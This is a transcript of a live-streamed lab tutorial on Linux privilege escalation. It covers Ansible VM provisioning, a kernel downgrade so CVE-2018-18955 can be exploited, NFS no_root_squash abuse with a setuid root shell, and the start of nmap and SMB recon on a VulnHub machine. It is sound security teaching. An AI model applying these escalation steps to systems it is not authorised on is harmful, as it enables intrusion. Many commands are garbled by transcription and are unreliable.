Let's see. Looks like it disabled the chat. Shouldn't do that. Let's see. Click it again. There we go. And now is it 1080? It looks like it is. Okay, so we got the 1080. That's fixed. Let me pop out this chat since it seems to have changed. Okay. What version of Kali? I have no idea, honestly. Whatever I have installed. So, for this video, we are going to be using Ubuntu, and I have a template that we're going to use Ansible with to deploy. So if I go to, actually, yeah, let's just do it this way. So if I get my OS builds, I have Ubuntu server. And if you don't have vCenter, you'll be able to do this once you get Ubuntu installed, and you can do a bunch of snapshots. So you can convert to virtual machine, and we're going to create this. And now this is a VM. We're going to power it up. I'm going to log in, change the password, and then we will go back to a template and downgrade this. Downgrade it being we're going to go to a different kernel. So let's allow pop-ups. Just logging in. If I can remember what password I have on this. Okay. Let's change it. I'm not going to do container. Especially because we're going to do a Kernel PrivEsc. So the container won't really work for that. I'm also just not a huge fan of containers in general. vSphere is a ESX management utility. It allows you access to some API to do some things. So what you're about to see is we're going to have a script that will automatically build us a Linux box. So hopefully people switch to the new stream. I don't know really how to fix that one. I assumed when I stopped and started again, it would automatically load the new one. So we shut down the server, and we're just going to convert this back to a template. So template, convert. And now let's go and learn what Ansible is. So Ansible is just going to be an automation utility. It's going to essentially SSH into the box and do a bunch of things to auto-configure. So once we build out a thing we want to PrivEsc in this Linux, then we're going to convert it to a Ansible template. Static and sound. Is anyone else having static? Hold on. Let's see. Audio is fine for other people. Okay. So Ansible will just make it so we can deploy the vulnerable configuration on the VM at other times. So to install Ansible, we need to do, I think, apt search Ansible. Is it in Kali? I've never actually installed it on Kali. It looks like it is. So we can do pip3 install Ansible. Do it this way as well. Okay, yeah, you can do it through pip or apt. I'm preferring to do it through pip just because I think this is how I did it in the past. So once we have Ansible installed, then we can create a Ansible config. The other things we're going to need is py-vmami, or however you pronounce that. This is going to be the Python library to interact with vCenter or ESX. So once we get this, then we can begin with the script. So we can also go to Google and search for Ansible deploy vCenter. I'm also going to add provision in there because I think that's another good keyword. So let's see, pip Ansible py-vmami. And then here's a sample thing. So this is essentially what we're doing. So now that we got Ansible installed, we're going to do py-vmami. We need to do pip3. And now we can do our secrets file. So I've already created a template, secrets.yaml. So if we look at what this file is, this is just going to be variables that's going to be used in the scripts. And the reason why I'm showing this is because I'm not actually going to type it out because I just don't feel like putting the actual passwords I'm going to be using. This was just a beer I was drinking while I created this one. This is a lab. So I'm going to copy secrets.yaml right here. I knew I'd leak that, but thankfully I have a temporary password in there. That's what I was going to change before I started this stream. What are we trying to do again? We're just creating an automated thing to deploy Linux. And then once we do this, the video is probably going to make a lot more sense. But I want to create the automation step from beginning to end. So we have secrets.yaml, and we need to create a playbook. And we can go over exactly what this does. I'm going to go to a slightly modified one I already have. So we can just copy this. Hold on. I know you can't see this. So we're going to call this provision.yaml. And I'm going to paste this. This is essentially the same thing as this script. It's just going to be slightly different. So we have host localhost, and that's because it's going to be using this host to log into vCenter. Gather facts, we're going to change this to no. If this is set to yes, when it logs into the remote box, it pulls a bunch of environments from it, such as like current username, host name, what OS it is. Thank you, Emil, for the donation. Did anything pop up on stream or not? I'm just curious. But we got, oh, there it is. So variables, secrets.yaml, that's going to contain all these variables. And I showed you in the example script. I'm not creating a box for Hack the Box. This is just going to be for learning. So this is going to log into vCenter, which is this thing. And then VMware guest, validate certs, that's fine. And here it is creating the box. And Ansible does loops a little bit weird. So I have the loop all the way down here. It's going to run through this set of codes for every item in this. And the reason why I do this is just so it's easy to provision a lot of machines. So we're going to create this host name as Ubuntu-01. And the OS, we're going to specify it is going to be the template Ubuntu-server-1804. So Ubuntu-server-1804. And the IP address I want to give this is going to be, let's do 60. And I'm just going to copy another line because let's deploy 2 boxes so you can see the benefit of doing this. So just getting rid of that blank line. So now if I just do Ansible-playbook provision and then secrets.yaml, that is that file that contains all the credentials. Let's see if it works. So it's doing vCenter login. It worked. It's saying clone the template. If I go back here, we can see it is making a machine right here. And now the machine should be powered up. So if I go to Ubuntu 01, we can look at this web console. And now we just got a machine. It's going to reboot this because it just set all the IP information. So if we go back to this playbook, provision.yaml, we told it to assign the IP 1030.060. So that's why it rebooted. Ansible already knew how to handle this, to create the configuration file to create this network. So once the machine boots up, it uses VMware tools, goes into the machine, and then pushes the new file to give it a static IP, reboots it, and then when the machine comes back up, it's got an IP address. So now I should be able to SSH to 1030.060 as ESXi. And this is an old image. There's one bug right here that I guess it just didn't take. When you work in templates and doing VMware clones, you have to kind of make sure the machine is at a decent state, and I thought this would have been executed. So I removed all the SSH host keys. So I was hoping when the machine booted up next, it would automatically generate a new SSH host key, but it doesn't look like it did that. So I'm just going to manually do that, and then we'll look at that in a little bit, exactly why it didn't. So sudo, it's going to create the new key. So now I should be able to SSH to this box. And we have a fresh install of Ubuntu. So if you're confused or you don't want to do all that, if you just get a Ubuntu machine to this point, we can go forward. I figured I'd just do that one. So while we wait for people and the people out of here get some content. Let's see. Did the link I send out? Oh. Hold on. I'm going to link the new thing because I see why people are in the old chat or the old stream. Let's see. Okay, so if we go back to this, we can actually see it did create Ubuntu 02, and that has the IP address of 10.30.061. So created 2 machines. We don't need that second machine. That was just showing you what that would do. So what I'm going to do is create a snapshot right here, and we're just going to do fresh install. Okay. So now we can work on showing the PrivEsc. The very first one I'm going to do is we can go over what I have so far. Hold on. Let's see. This is a part of a presentation I'll be doing in the near future. Sudo, we don't want to do that. Kernels. So let's do this CVE 2018-18955 PrivEsc. So if we look at our kernel right now, we are running the latest, or somewhat latest, February 2020. The CVE we had pulled up was from 2018, so that's not going to work because we're already patched. So we have to install the old kernel on this machine. So what we're going to do is Google Ubuntu old kernels. And let's see. Install. I'm just looking for the location of where all the kernels are. So kernel.ubuntu.com, squiggly kernel-ppa mainline. And we're not going to do precise because that's a Ubuntu distro. We're just going to go back to mainline, and we have all of these kernels. So we want to pick one that is somewhere in 2018 because that's the PrivEsc we want to do. So I'm going to grab this, and we're going to search this CVE with Launchpad and see if it tells us what version this was patched in, because we want to install a kernel before that. So let's see, 2018, somewhere in November. So let's go back here, uname-a, we're on kernel 4.15. So what I'm going to do, search here, v4.15, and we're going to pick one that is before November. So let's do 4.15.18. So this kernel should be compatible. And we want to build for AMD 64 because our machine is 64-bit. And we're going to copy these. So the first one is going to be the all. And will have to be root, so sudo su. I just typed the wrong password. Okay. So we're just going to download the files. Copy the whole thing. Let's see. Unable to resolve host address. Link location. So we want to download all, generic, and then this one, the Linux image generic. We don't need the low latency. And then we'll download the last one. And then it's as simple as, oh, I download this one of them twice. So we have image, headers, headers all, and we don't have headers generic. Copy link to location. There we go. So now we have Linux headers all, Linux headers generic, and Linux image generic. So I'm just going to install this with dpackage. And then while that installs, I'm going to download these files to Kali because we want to automate this with Ansible. So make dir, we'll just do kernels and wget each of these. So now we have each of them. We're just going to reboot and see if we get to a old kernel. So again, uname-a, we see February 2020. Hopefully, when we reboot, we go down to 2018. So ping 1030.060, and we'll wait for that to come back and check on chat. Okay, so let's log into this box and see if we did it correctly. uname-a, we are now on a 2018 kernel. So this one should be compatible with this exploit. So we would try to do CVE 2018 18955. So if we just Google this, let's go to Linux kernel exploits, and let's download this. So we probably should clone the repo. Copy link. wget. And then we're probably going to need gcc and unzip. So let's do sudo apt install gcc unzip. Let's see, sudo apt update. And then install these two. I'm just making sure it's not going to install a more up-to-date kernel by reading this real quick. Looks fine. Yeah, I do a lot of sysadmin type work outside and some development outside of doing videos, ME. So let's unzip master. Let's see. Put it here. 2018 CVE 2018 18955. So I just chose this exploit because it's relatively new. We could have done like Full Nelson, Memper Dipper, Dirty Cow, or this one. I was just giving common kernel exploits in this slide. So let's do exploit cron.sh and see how this works. So this one is going to create a entry in ETSI cron tab. So before we do this, let's SSH to this box again. IPsec at 10.30.0.60. Okay. And let's run exploit cron. So it's executing the subshell. So if we do cat etc cron tab, we can see this had created an entry in there to execute this command. If we look at this command, it's going to chown root on temp sh and give it a set UID bit, and I'm guessing it's going to execute it. So this will be the first one, and then after we do this, we're going to revert the machine and try to make an Ansible script to automatically do this. Or we'll do a vote. We'll move to the next one, or go back and automate this to deploy it. So how do you want the thing to be? Do you want to go through all the exploits first, or go through exploit, learn how to do it in Ansible so you can copy it in a lab, and then go to another one? So what do people in chat want? So we can see we are now root, successfully downgraded the kernel. My education, I don't really have one. I never went to college. I just went into the workforce out of high school and then self-taught pretty much everything else. So Ansible, automate, automate. So 2 people say automate. So it looks like a lot of people want to do automation. Some people want exploits, but we're here to learn how to do more than just exploit. Eventually, when I do this presentation and finish all the slides, you'll have all the exploits at once. So let's now go back and learn some Ansible. What are my specs of an ESXi host? It's let's see. Go to Firefox. It's pretty beefy, I think. This one is... It's a dual-core Xeon with 164 gigs of RAM. Oh, not a dual-core Xeon. 2 Xeon processors, I think 10 cores each. I don't know exactly where to go to see that. Probably monitor. No. I'm sure there's a place to go. I don't feel like clicking all around in vCenter. So let's go back to a Ubuntu machine. And let's revert. Or snapshot. Snapshot, revert to latest. So this is before we did anything with the kernel. So in order to create a roll4 box, you need Ansible Galaxy. So we'd do pip3 install Ansible Galaxy. And this is going to create a skeleton for us. What? Do I have it already? Oh, I already have it. So we'll do init, and the role is going to be, we'll call this downgrade kernel. So what that did was create a bunch of folders for us. Each of these means something. The main one I touch is tasks, vars for variables, and files. So let's create our, let's call this please subscribe.yaml, and we're going to create a playbook. So let's see. Let's do Ansible playbook example. Intro into playbooks. Let's see. Probably Ansible-examples is what we want. Will this work on VMware Pro? Well, the beauty is the only piece that requires like vCenter, or requires the, I guess, I don't know what I'm trying to say. The first piece of the video, when you provision a machine, that is going to require something more than Workstation. You could probably go with Vagrant or something on Workstation, but if you want to actually provision a template, you're going to need ESX, and you'll probably need vCenter. You could also do it with like Proxmox and other things. vCenter is just pretty clean. So, but after that, once you have the VM, you can do this with anything. So all we're going to do now is this playbook, please-subscribe, is going to log into the Linux host and then do the downgrade for us. So that's why you don't need ESX or anything. You just need a Ubuntu VM. Ansible is 100% on SSH, and on Windows, it can use Windows Remoting, which is PowerShell. So, where was I? Ansible to deploy. Ansible examples. So here's a bunch of examples of doing things in Ansible. So if we go Windows, you can see different services like ping. Let's go, is there Linux? Doesn't look like it. So I'm just going to type it up. So the very first thing we're going to have to do is create a inventory file. So let us v host.ini. You can do YAML for inventory, but INIs are going to be the easiest. Learn some buffer overflow. If you just go to ipsec.rocks and type probably overflow, you'll come with videos. I'm really not the best at giving examples of where to go learn things, because most of the time I learned it like 10 years ago, and the resource I did is kind of out of date or not even existent. So what I'm doing right now is saying the Linux host are going to be 10.30.0.16 and 10.30.0.60 and 10.30.0.61, and Linux vars Ansible user is equal to ipsec, and Ansible password is going to be password1. I think that's what I did. I'm not sure if I have an exclamation point at the end of it. Let's test real quick. ipsec at 10.30.0.60, password1. Yep. So the next thing we're going to have to do is create our actual playbook. So if we go back to the, I didn't create it, please subscribe.yaml. The start of every file is 3 dashes. We can do host 10.30.0.60, gather facts. We're going to do yes, so it has all the variables. Am I looking for exploit development or 0 days? We're not doing any exploit development or 0 days in this video. This is mainly a basic one of creating a bunch of Ansible stuff, I guess. I don't know. Roles. And the role we called was downgrade kernel. So if you went through these example Ansible playbooks, you'd kind of pick up the syntax. So rolling update.yaml, you can kind of see how it's doing this. So this is that's pretty much how I learned Ansible, is going through the examples of things you can do in these YAML. The role, that is going to be, the thing we had created. So if we go into a downgrade kernel, we can do tasks, and then main.yaml. These going to be the tasks we actually execute. So, hold on. What we want to do is give it a name. So this is going to be anything you want. We're going to say copy files, and then the module we're doing is the copy module. Source, role path, files, and I wonder if we can do a stir. I don't know if I can do this. We're going to find out. Destination, dev, shm. Let's see if I can do this. We have to put stuff in the files. Will I do a Vaughan Hub machine today? Let's do 1 or 2 more of these, and then we can do a vote if we go to Vaughan Hub. So I'm just going to put all these .deb files in the PrivEsc downgrade kernel files. And I just deleted it. That's what happens when I talk, read, chat, and type at the same time. So, thought ahead, thankfully, and I created that wget script to do it. So we have all 3 files here. So let's do the Ansible playbook on please subscribe, and we're going to give it the host.ini file. And let's see. We need to install SSH pass. What are the benefits of doing this automation versus snapshot? Because there's really, in building this machine, there's no real benefit other than you won't have to download the whole machine for me. You can just run the Ansible playbook and it will do it for you. The main benefit to doing automation in general is just it saves a bunch of time. Like, I have playbooks that will log into a machine, install all my C2 software before I do an engagement, or log in, install Elastic, or I even have it build out a whole Windows domain. So after we do this, I can see if I can show you the Windows domain stuff. I don't know what's actually in it. But it's just, again, bunch of good stuff for automating things and saves time. So now we have SSH pass installed. Let's run this again and see if it copies everything. Let's see. So it doesn't look like it wanted to use the star. So we're going to have to specify each file. So there's probably going to be a better way to do this, but for now, we're going to specify each one. So source files is this. And we can probably do another copy. Let's see. Source, role path, files, dest, dev, shm. Copy this. let's see, downgrade kernel files. So here's the next file. I should have went to the beginning and did $. That would have been faster. And then the next one. I could probably do a loop and do this. When am I turning Patreon back on? I think Patreon may have went on last month, actually, because it looked like it charged people when I thought I set it not to charge. But I'll have to look into that. I just noticed that before going live. I'll probably turn it off again. Let's see. So now when you run this playbook, is it going to copy the 3 files? Let's see. Looks like it did. So let's SSH. We haven't SSH into the box. No, because we reverted a snapshot. cd dev shm. It only copied 1. So let's go back into this playbook. Tasks. Main. And we'll say copy. I really should have looped this. Linux header. All. Copy. Linux header. Generic. And this will be Linux image. Let's try this. So now there should be 3 tasks in this one playbook or role. So before we do this, let's delete the file and run this and see what happens. It looks like it is running each of those tasks now. So you can see copy Linux header all, changed. And I think Ansible will automatically know if the file exists and it won't say changed. Okay. So it made 0 changes to the host. So that's just one more benefit of Ansible. And thank you, Wreckit, for the donation. Let's see. Going back here, we have all 3 files. I'm pretty sure you can send more money. Thank you, Paul. So if we go back into the downgrade kernel thing, now what is left is executing it. So let's go into tasks, the main, and we'll do -name, install the kernels. And let's see, Ansible dpackage install. Is there already a playbook for this? Dpackage selections. Let's see, name, Python, selection, hold. That's not what we want. Let's do Ansible Linux run command. Execute command on the host. Let's see. Thank you, Wreckit, for the donation again. Let's see. Return message a day. So we just do command. So command let's try dpackage-i dev shm stir. See if that works. Thank you, Blue Fox. And before we do this, I'm just going to SSH down here so we have it in the same panel, and then we'll clean out the files and see if it works. Thank you, Kay. So let's see if that command runs. Let's see, it doesn't look like it worked. So requires super user privilege. So let's do sudo su. And what I have to do is edit the sudo as file to say no password on this. Sudo, let's see. Cat etc sudoers. Does Callie have the syntax? Let's see. Sudo do not require password. Okay, let's see. Vi sudo all no passwd all. I should be able to edit this. No passwd all. Okay. So now in Ansible, all we do is say become yes. So become, I think true. I think it's true, not yes. So now we'll run this again, and we're going to see if it actually runs that command. And then afterwards, we're going to just reboot the box. So it's copying all the files. That last one's taking a while. There we go. It's installing, and it still failed. No such file or directory. So let's install each one. Let's see, cd downgrade kernel, tasks, main. Let's see. Install header generic. Grab this. This one is all generic. Probably should do it the loop or something. But we can clean it up later if that's what you guys want. But this is generally just what I'll spend a few hours a day doing to try to learn all the syntax and then go back and clean it up. So let's see. Will this work now? I can use the apt module to install a deb. I had looked at that. We can try it again. I'm sure you can. Let's see. Let's see. Apt module Ansible. Why not use DigitalOcean snapshots? Because I have vCenter at home. So, like, I can pay a monthly cost, or I could just run it in my house. Default depackage option, install recommends, purge, upgrade. So what I didn't see in this module, K, was specifying the exact file. So that's why I didn't go with this. In most cases I would, because you're just installing it out of apt, but I don't know if I do name and provided a .deb file, if that would automatically install it. So the stir.deb did not work. However, doing them individually did. So if we do uname-a, it is the 2020 kernel. So if I reboot this, we will see if it downgrades. Probably won't be showing Docker. There's a deb module. Do uname-a, and it's downgraded the kernel. So there's one way, and Void said we can do one thing, which I want to try real quick. So let's revert the snapshot and then see if we can get it working with the wildcard. Ubuntu, snapshot, revert. Yes. I'm not going to do heavy red team stuff streaming. Let's see. K is saying I have a deb option in the apt module. Sometimes reading is hard. There is. Well, what do you know? So let's try this. This could be a bit better. So downgrade kernel. Let's see. Git init. Sweet. Git commit. Or we'll do git add everything. We probably should have done a git ignore and secrets.yaml. But, oh well. Git commit -m. Initial with installing kernel. So that's another good thing about Ansible is you have change control. Let's see. So we go to tasks. Let's go to main. And let's get rid of these commands. And we're going to do install the packages. And then we're going to use the apt module. And then we'll try deb, and then specify the path. There's one. Oh man, sometimes I hate when it doesn't format correctly. And he'll be the third. So we'll see if this works. We're going to have to log back into the box and edit the sudo file. Void, I think that may work. So let's try this. Unable to install package, cannot open file. No such file or directory. Dev shm. Let's see, does this file actually exist? File exists. Not sure what that error message is about. Add a few verbose flags. Let's see. I'm going to try doing just one. Downgrade kernel. Tasks. Let's look at this. If :/ would attempt to download deb before installing. Wonder if I need to do like file // remote source and app tag. I'm not sure what the remote source tag is. Someone's saying it's looking at my local machine. So that's a simple fix. Let's just go to my local machine and test. So kernels, downgrade kernel files, cp stir to dev shm. And I really hope it doesn't now install it on my host machine, which it shouldn't do. Cannot open file, no such file. So that didn't work. So it's not pulling off my host machine. Try this. And then we'll do single. Single as in a single package. Failed downloading. So it didn't want that. Let's give it just one. Yeah, I'm only streaming on YouTube. So let's not do it in the list format. So I think it just didn't want it as the list. Yep. So now it installed it. So that was the issue there. So let's see. How do we install multiple packages? Why am I downgrading the kernel? So a kernel exploit works. Let's see. Ansible install multiple deb packages. Feature request. Allow multiple deb. Multiple, I want to install them all with this. Name, let's see. Copy deb with items. Let's see. Source item. So let's try updating our script real quick because this looks good. That would go over. Let's see. So we're doing copy items. Action, copy. Gonna see if this works. Source. Let's see. Item. Destination. Item. Can you try renaming files? Yeah. We'll try that right after this. Maybe it is one of these. So. Sin, it's super easy to downgrade kernels, like, in a command line. Like, I don't need to use QEMU. Doing it through automation is what makes it difficult. So let's see. With items. We'll do Linux. We'll do header-generic.deb, header-all.deb, and image-generic.deb. Is that what you wanted me to rename the files to? Whoever it was? So we can try doing this the same thing. Action apt. We'll try this. Args. Item. See if this works. If not, we'll probably just move on and do something else. Because we had it working, and then we just tried to optimize it. So tasks. Let's do files, Linux headers. What is it saying? Underscore, no, 184 450 dash. And this will be headers dash generic deb. Linux headers 45. This will be headers all dot deb. This will be image dot deb. Tasks main dot YAML. Headers. We just said image. Okay. So we can try running this again, see if it works. If it doesn't, we'll just move on. So it looks like it's copying each of those files. And there we go. So now we have it working a little bit more optimized. So it just installed headers-all. There's probably going to be one that it doesn't change. Probably this next one, because I think we already had installed it. So let's see. It's going to do the next one. Or did it just hang? Nope, there we go. So it looks like it worked. If we do uname-a, we are on the 2020 kernel. So let's reboot. Install. And there we have it. So we're now downgraded, and we have a playbook to do that. So in the future, if we ever wanted to downgrade the kernel again, we have an automated way to do so. So let's look at the next thing we want to do. So pulling up presentation. I'll start from the beginning of this and go over what the plan is. So this is a guide I started a long time ago and then kind of stopped. So it's kind of halfway done. We'll go through it. So we're going to start off with hindsight doesn't have to be 2020 when you begin doing this. Data is more important than privileges. Before you ever do a PrivEsc, you should ask yourself why. Because probably 9 times out of 10, when I get on a box, I don't need root. I just need data. So if I pop a web server, chances are I can access the database and all I want to do is a database dump and decrypt passwords. Give me root on that web server, probably not going to buy me that much. I could do things like backdoor SSH and capture clear text passwords when people log in, but again, may not buy me anything if I can just access the database, get the passwords that way, and decrypt them. It's a lot less noisy to not PrivEsc. I will add a reboot command to the end. So whenever you do a PrivEsc, keep it simple. So knowing if something is exploitable makes life 10 times easier than if it doesn't. So you're just avoiding any complexity. What I mean by that is when you do an exploit, try to create a file and not do a shell. If we go back to the CVE we had just done, let's go move here. Like probably a half hour ago or something, we did a CVE. Oh man, my Firefox is going slow. That just hung my VM. Weird. Let's see. We did this 2018 CVE, the latest one on this Linux kernel exploits thing. And when we exploited cron, it wrote an entry into the cron tab, but it didn't write a whole shell. You could probably do like a bash one-liner to get a reverse shell in a cron tab. I know you can. We've done it in videos. What it does is it copies an entry to execute a file, which then does a sticky bit on another file, and then goes and executes that file. So that's 3 different steps. So if something fails, you have 3 places to debug it. If you try to do a shell and it fails, you're like, well, did this fail at the network stack? Did it not execute at all? I have no idea what just happened. So, like, let's just do this real quick and we can see all the things it does. Again, it's not going to be the most OPSEC friendly thing because it's got like 5 or 6 tasks that it could get caught on. But in hindsight, if it fails, you know exactly where it failed and can start debugging. So we have to do apt install unzip and what was the other one? GCC, because we're going to have to compile something. Apt update. So now we can install these. It's already been an hour streaming. Wow. I made like no progress. So come on. Finish processing those triggers. We probably don't have to wait for it. But it's going to finish soon as I log in. I know it. IPsec at 10:30:060. Password 1. And we can wget. Come on. Go here. Copy link. So now we go into the exploit. 818955. And I want to run this at the top of the minute because it creates a cron entry to run every minute. So if I do it right at the top of the minute, then we're going to have the most time to look at what it does step by step. So give it another 15 seconds and then we will run it. Come on. Okay, it's a new minute. So when we do a cron, we have about 50 seconds. So if we cat etc cron tab, we see, okay, we got a file write. We know we can write to a file because we wrote to this cron tab. This cron tab, if we look at the permissions, only root can write to it. So we have one thing there. We wrote temp payload. What is temp payload going to do? It's going to run chown root on temp sh and then give temp sh the sticky bit. So if we look at temp, we got sh as well. Sh is just a shell, but it's an ELF file. And looking at it, it doesn't have the sticky bit yet. So we're just going to wait. We'll just do date. Oh, it should have it now. So if we do lsla on temp sh, there it is. And it has that set, not sticky bit, set UID bit. So keep it simple. We have a lot of things to troubleshoot. It helps. When you're doing SQL, try like a single quote, double quote, and one, a comment, and just see how the behavior changes. If you go straight into do a unit injection, you may hit something unexpected. You may fail at syntax, as we did last stream. There's a bunch of things you could fail at. Start simple, work your way up. And then you have the website ipsec.rocks to help you. How did I fix the losing the IP in the last stream? I just have a static IP now. So all I did was go in my Kali, the network setting, and set a static IP. When you do recon, go down the entire list. Don't just see the first thing and then try to pop a box. Like, if you do like linps, the very first thing that's going to show up may be the kernel, but you may have a like GTFO bin you can just execute to get root. And if you try going down the kernel path, you may crash the box. So always review everything before trying any type of PrivEsc. So in recon, manually, few good things to do. Uname -a, this is going to show the kernel. Find /-perm -4000, this is going to show set UID files. ss-lntp, it's just like netstat, it's going to show open ports. dpackage-l, or if you're on Red Hat RPM, this is going to show all the packages installed. And then if all else fails, it's always handy to run find/-ls to get a list of every single file, because what you're looking for may be odd. Maybe you'll find like /home/user/mysecretpassword.txt. You never know. So scripts I love using, linenum, linprivchecker, smart Linux enumeration, and linps. Sudo-l, we'll get into that under quick wins. Groups, know what each group can do. Like ADM reads logs, and if you can read logs of a box, you may want to check the SSH auth to see if someone tried logging in with their password. You'd be surprised how often you see that. Docker LXC, if you're a member of these groups, you can almost always PrivEsc. So that'll be a demo. We're not going to get into that demo now because it can take a little bit to set up. So quick wins. This slide, I just use xkcda for everything because it kind of shows how quick this slide was to make, I guess. Sudo, sudo-l, GTFO bins. Versions, this is where we were. We did the CVE 2018. Let's see, library. This is showing, always go into like PHP applications, Java applications, etc., and see what the package is. For instance, image tragic, you could maybe update that in apt on, I think that's Perl-image magic, I think is the library. But maybe the web application was bundled with the older version that it's using, and it may still be vulnerable. So nothing there. Permissions, how they work. So if you ever wondered what like 755 means, just check. So it's adding. So executes 1, write is 2, read is 4. So if you add all 3 of these, that's 7. If you want read and write, that's 6. If you want execute and read, that's 5. And again, if you're ever in doubt, you can run the stat command against a file, and it will tell you everything about it. So we have this setuid file, that's 4. If you remember with the find-4000, that's why, because we wanted to know this one. Then you got 775, so read, write, execute, read, write, execute. And then 5 is going to be, read and execute. If you can write files, here's some good locations to write to. If you write anywhere here, you can gain root, like adding someone into the sudoers file, adding an SSH key, etc. Setuid. Linux capabilities. Get into that. Haven't done those slides. Let's see. We may be able to do NFS real quick. So this was done in the jail video. So let's do sudo su v-etsy exports. Don't have it. Let's see. Linux setup NFS version 2. Or version 3. I think it's 4 that has authentication set up. Ubuntu. Sweet. Here we go. So we're going to want to install this nfs-kernel-server, apt install. Yep. And then create the export directory. Make dir/mount NFS. And NFS stands for Network File System. It's like remote file share. And version 3 doesn't do authentication. So edit Etsy exports. The Etsy exports. Let's see. I think that'll work. Yep. So systemctl start NFS. NFS-kernel server. If you want burp to go to public servers, you just have to add the CA certificate. So if you go to http://burp, CA certificate, save file, type SSL in the search. No, type certificate in the search. View certificates. And then go to authorities, import your burp cert, and then allow it to identify websites. And then you'll be able to go anywhere with burp. The VM is going to be shared with Patreon, and I'll probably have the Ansible stuff shared with everyone. So you'll have to learn Ansible to be able to do it for free. But if you just want the VM, it'll be done with Patreon. I could do enable to make it persist, but I don't want to right now. So do we have show mount -A? No, -E for export. 1030.060. Export list is not being shown. I wonder if export list is disabled. Mount -T 1030.060. Mount NFS /mount. Access denied. ESXi exports. What is screwed up? Config eth0. Let's just do 172.16.10.0/24. And we're going to restart the service. There we go. So now this is exposed to me. If I try to mount this, cd/mount, touch test, doesn't look like it wanted to create. -E. Let's just not specify -T. 1030.060/mount. It's not working. Mount -T, NFS. Let's do -O vers equals 2 for version 2. Vers equals 3. We can write here. We can see it. Okay. So at least now we're getting a error message. So let's go back in the exports. So read write, sync, no subtree. I wonder if like squash root is on by default. Let's see. Cat etsy. If we do mount, it's mounted read write. So doing the mount -O won't really do anything. So let's go as, let's do user add ipsec su dat. We'll mount this again. su-ipsec cd/mount touch testing permission denied. Let's see. Why is it giving permission denied? So I don't think it's the squash root anymore. because version 3 I don't believe has authentication. I think it's version 4 which they added that. And I'm UID 1000 on both ends. So let's see. Wait. There's one thing that could have screwed that up. chmod 777 NFS. Because UID 1000 couldn't write to this folder. There we go. That was it. So NFS right now has squash root on. So let's see. Disable squash root. No underscore root squash. So what root squash in NFS means is anytime it sees UID 0, it puts it to the nobody user. So it essentially rewrites root to nobody. So now fixing this. If we umount/mount, mount it again, cd/mount, ls, touch, test3. So the PrivEsc vector with NFS is I can't execute files with this. Like in this window, I can't execute a file. I can only read and write. So the trick is you just create a file and give it the setUID bit. So let's do which vi cp user bin vi to mount NFS. We go in here, and then on this end, we do lsla, chown root to vi, and then chmod plus, is it s? vi to give it the setUID bit. And now on this end, we can take advantage of that. So we can execute vi, and then in vi, if you ever do : you can execute commands, and it didn't put us as root. So I'm guessing this version of vi is not doing a setUID. chmod 4755 vi. Yeah. So that one's not doing a setUID call. Let's see. Do we have the Linux kernel exploits? Let's take a look at what one of these was. Do we have a shell? Root shell.c. Let's see what this is. Yep, let's just compile this. So this is just a C program that's calling setUID 0, setGID 0, and then executing bash. So gcc root shell.c-o. We'll just call it shell, and we'll copy shell to mount NFS. And then chmod, or chown root on shell. And then chmod plus s on shell. So now that is setUID as well. Mount NFS /shell, and we are root. Someone wants to say sh. Let's see, is this just symlinked? This is symlinked to dash, so I think dash normally lets you. So bin dash. We can try this one. chown root dash chmod plus s dash plus s. This one's not doing it. Some Linux distros will automatically not put those set UID binaries in things. So it looks like this version of Ubuntu, they heard it that way. So like dash and vi, they won't do a set UID call at the start. So you just drop your own. But is there anything else we want to get into? Do we want to keep doing this? We can either automate installing NFS, we can do a Von Hub machine, or we can look into other PrivEscs. So just waiting to see what people say. There's a small delay. Let's see. I can type it in chat. One person said Von Hub. As Ross said on other PrivEsc. Von Hub, Von Hub, Von Hub, Von Hub. Okay. So let's figure out a Von Hub machine to do. Hold on one sec. Okay. If you want Docker escape, then just go to ESXi.rocks. I'm not doing API testing. There's no need to spam. So, looking at the machines we have, we did DC9, we did Masscrafter, so let's see. Bravery, Mercy, or Development. Out of those three, what do you want to do? If you want to see LXC, Docker, etc. escapes, there's this great website that if you do ESXi.rocks and type in Docker, you'll find stuff relating to Docker. So let's see. 1, 2, 3, 4. It's looking like we're going to do Mercy. So let's see. Let's power this machine on. And I'm going to make sure ETH1 is connected. Host only connected. That looks good. Okay, Mercy, we're at a login prompt. Network, let's turn it to host only. And just reboot this machine for good measure. Why host only? It's just the network where my machine would talk to this Von Hub machine. I could use bridge, but I don't want to put a VM I've not validated on my network that can talk to everything else. So host only means that VM isn't going to be able to talk to machines outside of my computer. So it won't be able to go to the internet, give someone a reverse shell, and do badness. DH client -I ETH1. I don't know why it got that 172 address. Come on. Sometimes I really don't care for the Kali, or the new version of Kali. I don't really take requests on what to do videos for, Shrenik. I'm pretty sure if you go look at ipsec.rocks, you'll find what you're looking for there. Let's see. There we go. Now it should be on DHCP. I'm about to just statically assign this interface. There we go. Finally have an IP. So, upscan interface ETH1 192.168.48.0/24, and we'll see what Mercy's IP is. So I'm guessing Mercy is going to be 192.168.48.134. So let's start off with the nmap. So let's make dir nmap, nmap-sc for default scripts, sv, enumerate versions, oa, output all formats, put in the nmap directory and call it Mercy, and then the IP address, which is 192.168.48.134. I'm actually going to cancel this out real quick and do a -v flag for verbose, so it shows me open ports as it finds them. We see 139, 90, 993, 110, 53, so a bunch of ports are open. I'm going to do a second nmap with all ports. So nmap-p- to do all ports. That's ports 1 through 65,535, I think, or 34. It's a metric ton of ports. So do that. We're not going to do any scripts because that would take a while. We'll do -oa. Put this in mercy-all ports, and then the IP address. And beforehand, I'm going to do sleep 300 to wait 5 minutes before I run this nmap, because if I don't do that, then, well, I'll have two nmaps going at once, and they could collide and provide false results. So while we're waiting, I guess we can just take a look at what services we have. 8080 looks super familiar, so we can start off with that one. 445 as well. We could ping this box, 192.168.48.134, and since we see 64, we know this is probably going to be a Linux box, because the default TTL on Linux is 64, Windows is 128, and Cisco is 254, I believe. So if you see a TTL between 65 and 128, chances are you're dealing with a Windows box. If it's not that, then probably Linux. So thank you for the donation, Wreck It, for both of them. So let's just do SMB client -capital L 192.168.48.134 to see if there's any anonymous, any ports open. We do have a QIU share. So what I'm going to do, let's go to Cherry Tree and take some notes. So Mercy, notes, SMB, QIU, or QUI, QIU. So let's do mount, we can do SMB client 192.168.48. What was it? 138? 134. /QIU. And we get access denied. We can try -N for, I think, null session. It doesn't look like that worked, but doesn't look like we can access it. So it's just showing us the share is up. Nmap script has finished, so let's go and take a look at all the ports. We do have DNS, so what we could try is dig plus AXFR at 192.168.48.134. Actually, we need to know a TLD or something to do a zone transfer. So let's just try NS lookup server 192.168.48.134. Whoops. Server 